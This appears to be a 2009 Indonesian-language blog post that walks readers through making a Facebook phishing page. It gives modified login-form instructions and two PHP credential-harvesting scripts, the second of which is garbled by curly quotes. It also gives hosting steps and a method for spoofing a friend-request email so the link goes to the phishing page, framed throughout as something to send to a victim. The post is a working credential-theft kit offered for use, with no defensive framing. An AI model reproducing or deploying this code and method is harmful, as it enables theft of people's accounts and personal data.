Friday 16 October 2009

Phising

Facebook phising methode

Step by stepnya :



1. Buka
http://www.facebook.com/login.php, lalu view source. copy dan paste ke notepad.
Cari "action=" (tanpa quote) dan kita akan memulai editingnya.



Image
pada lingkaran merah action="https://login.facebook.com/login.php" rubahlah menjadi action="next.php" (tanpa quote)
pada lingkaran biru, rubah methode dari "POST" menjadi "get"
simpan notepad ini menjadi index.php (jangan html)
2. Buka notepad baru isikan kode berikut :

<?php

header("Location: http://www.Facebook.com/login.php ");

$handle = fopen("pass.txt", "a");

foreach($_GET as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");

}

fwrite($handle, "\r\n");

fclose($handle);

exit;

?>

========================OR=====================

$datum = date(‘d-m-Y / H:i:s’);
$ip = $_SERVER['REMOTE_ADDR'];
header(“Location: http://www.Facebook.com/login.php);
$handle = fopen(“ppp.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “IP: $ip | Date: $datum (Date=0 GTM)\r\n”);
fwrite($handle, “\r\n”);
fclose($handle);

setcookie (“user”, “empty”, time()+3600);
exit;
?>






3.
Buka notepad lagi biarkan kosong, lalu simpan dng nama pass.txt.
Upload 3 file tersebut "index.php, next.php, pass.txt" kedalam hosting misalnya 110mb.com, spam.com atau 007sites.com.
OK, Kamu sudah punya phising page facebook skrang.
4. Langkah-langkah spoofing.
copy content asli undangan pertemanan dari facebook.
edit hyperlink dari : http:/www.facebook.com/n/?reqs.php ganti dengan halaman phising anda, hal ini tidak akan merubah tampilan di content asli facebook tapi tetap mengarah ke halaman phising kamu.
phising siap dikirim ke korban kamu.


Image


sorry if im write it in Indonesia lang coz im Indonesian ;)

ex: http://www.facebook.com